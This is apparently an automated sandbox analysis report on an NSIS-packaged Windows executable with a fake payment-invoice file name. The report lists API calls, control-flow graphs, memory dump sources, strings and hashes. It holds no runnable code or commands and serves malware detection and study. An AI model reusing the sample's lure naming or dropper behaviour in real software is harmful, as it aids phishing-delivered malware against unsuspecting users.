• Control-flow graph of the function whose entry block is at 0x0040396D (rendered graph; edge data omitted)
APIs
  • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
  • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
• lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76943420,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000), ref: 004039EE
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\classrooms,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
• GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\classrooms), ref: 00403AD5
  • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
• RegisterClassW.USER32(007A79C0), ref: 00403B12
• SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B2A
• CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
• ShowWindow.USER32(00000005,00000000), ref: 00403B95
• GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
• GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
• RegisterClassW.USER32(007A79C0), ref: 00403BD7
• DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\classrooms$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 1975747703-3030292720
• Opcode ID: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
• Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
• Opcode Fuzzy Hash: 90026218f8455635aced1ea3c9adb74d2a6e6c4d32214fa6dc51bb2c99e1baf3
• Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

Control-flow Graph

• Control-flow graph of the function whose entry block is at 0x00406281 (rendered graph; edge data omitted)
APIs
• GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
• GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
• SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
• SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
• CoTaskMemFree.OLE32(007924D8), ref: 0040642A
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
• lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 717251189-1230650788
• Opcode ID: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
• Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
• Opcode Fuzzy Hash: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
• Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D

Control-flow Graph

• Control-flow graph of the function whose entry block is at 0x004052C3 (rendered graph; edge data omitted)
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,769423A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,769423A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(007A0F00,0040323B,0040323B,007A0F00,00000000,007924D8,769423A0), ref: 0040531E
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
• Opcode ID: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
• Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
• Opcode Fuzzy Hash: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
• Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8

Control-flow Graph

control_flow_graph 526 4065c9-4065e9 GetSystemDirectoryW 527 4065eb 526->527 528 4065ed-4065ef 526->528 527->528 529 406600-406602 528->529 530 4065f1-4065fa 528->530 532 406603-406636 wsprintfW LoadLibraryExW 529->532 530->529 531 4065fc-4065fe 530->531 531->532
APIs
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
• wsprintfW.USER32 ref: 0040661B
• LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%S.dll$UXTHEME$\
• API String ID: 2200240437-1946221925
• Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
• Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
• Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8

Control-flow Graph

control_flow_graph 533 4030fa-403111 534 403113 533->534 535 40311a-403123 533->535 534->535 536 403125 535->536 537 40312c-403131 535->537 536->537 538 403141-40314e call 4032f2 537->538 539 403133-40313c call 403308 537->539 543 4032e0 538->543 544 403154-403158 538->544 539->538 545 4032e2-4032e3 543->545 546 40328b-40328d 544->546 547 40315e-403184 GetTickCount 544->547 550 4032eb-4032ef 545->550 548 4032cd-4032d0 546->548 549 40328f-403292 546->549 551 4032e8 547->551 552 40318a-403192 547->552 553 4032d2 548->553 554 4032d5-4032de call 4032f2 548->554 549->551 555 403294 549->555 551->550 556 403194 552->556 557 403197-4031a5 call 4032f2 552->557 553->554 554->543 565 4032e5 554->565 559 403297-40329d 555->559 556->557 557->543 567 4031ab-4031b4 557->567 562 4032a1-4032af call 4032f2 559->562 563 40329f 559->563 562->543 571 4032b1-4032bd call 405e03 562->571 563->562 565->551 568 4031ba-4031da call 40679a 567->568 575 4031e0-4031f3 GetTickCount 568->575 576 403283-403285 568->576 577 403287-403289 571->577 578 4032bf-4032c9 571->578 579 4031f5-4031fd 575->579 580 40323e-403240 575->580 576->545 577->545 578->559 581 4032cb 578->581 582 403205-403236 MulDiv wsprintfW call 4052c3 579->582 583 4031ff-403203 579->583 584 403242-403246 580->584 585 403277-40327b 580->585 581->551 591 40323b 582->591 583->580 583->582 588 403248-40324f call 405e03 584->588 589 40325d-403268 584->589 585->552 586 403281 585->586 586->551 594 403254-403256 588->594 590 40326b-40326f 589->590 590->568 593 403275 590->593 591->580 593->551 594->577 595 403258-40325b 594->595 595->590
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                                                          • API String ID: 551687249-2449383134

Control-flow Graph

control_flow_graph 596 405792-4057dd CreateDirectoryW 597 4057e3-4057f0 GetLastError 596->597 598 4057df-4057e1 596->598 599 40580a-40580c 597->599 600 4057f2-405806 SetFileSecurityW 597->600 598->599 600->598 601 405808 GetLastError 600->601 601->599
APIs
• CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
• GetLastError.KERNEL32 ref: 004057E9
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
• GetLastError.KERNEL32 ref: 00405808
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\Desktop
• API String ID: 3449924974-3370423016

Control-flow Graph

control_flow_graph 602 405d80-405d8c 603 405d8d-405dc1 GetTickCount GetTempFileNameW 602->603 604 405dd0-405dd2 603->604 605 405dc3-405dc5 603->605 607 405dca-405dcd 604->607 605->603 606 405dc7 605->606 606->607
APIs
• GetTickCount.KERNEL32 ref: 00405D9E
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C), ref: 00405DB9
Strings
• nsa, xrefs: 00405D8D
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
• "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 00405D80
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-2822682656

Control-flow Graph

control_flow_graph 608 10001759-10001795 call 10001b18 612 100018a6-100018a8 608->612 613 1000179b-1000179f 608->613 614 100017a1-100017a7 call 10002286 613->614 615 100017a8-100017b5 call 100022d0 613->615 614->615 620 100017e5-100017ec 615->620 621 100017b7-100017bc 615->621 622 1000180c-10001810 620->622 623 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 620->623 624 100017d7-100017da 621->624 625 100017be-100017bf 621->625 626 10001812-1000184c call 100015b4 call 100024a4 622->626 627 1000184e-10001854 call 100024a4 622->627 648 10001855-10001859 623->648 624->620 628 100017dc-100017dd call 10002b57 624->628 630 100017c1-100017c2 625->630 631 100017c7-100017c8 call 1000289c 625->631 626->648 627->648 642 100017e2 628->642 637 100017c4-100017c5 630->637 638 100017cf-100017d5 call 10002640 630->638 639 100017cd 631->639 637->620 637->631 647 100017e4 638->647 639->642 642->647 647->620 652 10001896-1000189d 648->652 653 1000185b-10001869 call 10002467 648->653 652->612 655 1000189f-100018a0 GlobalFree 652->655 658 10001881-10001888 653->658 659 1000186b-1000186e 653->659 655->612 658->652 661 1000188a-10001895 call 1000153d 658->661 659->658 660 10001870-10001878 659->660 660->658 662 1000187a-1000187b FreeLibrary 660->662 661->652 662->658
APIs
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
• GlobalFree.KERNEL32(00000000), ref: 10001804
• FreeLibrary.KERNEL32(?), ref: 1000187B
• GlobalFree.KERNEL32(00000000), ref: 100018A0
  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,8BC3C95B), ref: 100022B8
  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Global$Free$Alloc$Librarylstrcpy
• String ID:
• API String ID: 1791698881-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                                                                                                                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Control-flow Graph: function 405c38 (blocks marked Executed / Not Executed); calls 40625f, 405bdb, 4064f3, 4065a2, 405b30, 405b7c; APIs lstrlenW, GetFileAttributesW
APIs
• Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 0040626C
• Part of subcall function 00405BDB: CharNextW.USER32(?,?,fareafvrgende\Djrve27.gud,?,00405C4F,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405BE9
• Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
• Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06
• lstrlenW.KERNEL32(fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405C91
• GetFileAttributesW.KERNELBASE(fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420), ref: 00405CA1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: fareafvrgende\Djrve27.gud
• API String ID: 3248276644-3469630132
• Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
• Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
• Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
• Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E

Control-flow Graph: function 40612d (blocks marked Executed / Not Executed); calls 4060cc; APIs RegQueryValueExW, RegCloseKey
APIs
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
• RegCloseKey.KERNELBASE(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: Call
• API String ID: 3356406503-1824292864
• Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
• Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
• Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
• Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4
APIs
Memory Dump Source
• Source File: 00000000.00000002.2958030354.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2957996805.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958065115.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.2958090906.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: EnumErrorLastWindows
• String ID:
• API String ID: 14984897-0
• Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
• Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
• Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
• Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                                          • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                                                                                                          • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: wsprintfW.USER32 ref: 0040661B
                                                                                                                                                                                                                                            • Part of subcall function 004065C9: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040662F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
• Instruction ID: 7f6190fd0785004a6ee8fc72a27bac991e5bdadb2fb285410322192917ba6648
• Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
• Instruction Fuzzy Hash: AFE02C322042016AC2009A30AE40C3B33A89A88310303883FFA02F2081EB398C31AAAD
APIs
• GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
• Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
• Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403343,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76943420,0040359C,?,00000006,?,0000000A), ref: 00405815
• GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 00405823
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction ID: 364d0df367319b35fd7f444a265edab083d6b2b9b53b3b0e5bc7a719fbea1b4c
• Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
• Instruction Fuzzy Hash: 29C08C312105019AC7002F20EF08B173E50AB20380F058839E546E00E0CE348064D96D
APIs
• ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403305,00000000,00000000,0040314C,?,?,00000000,00000000,00000000), ref: 00405DE8
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
• Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
APIs
• WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,?,00000000), ref: 00405E17
Memory Dump Source
• Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
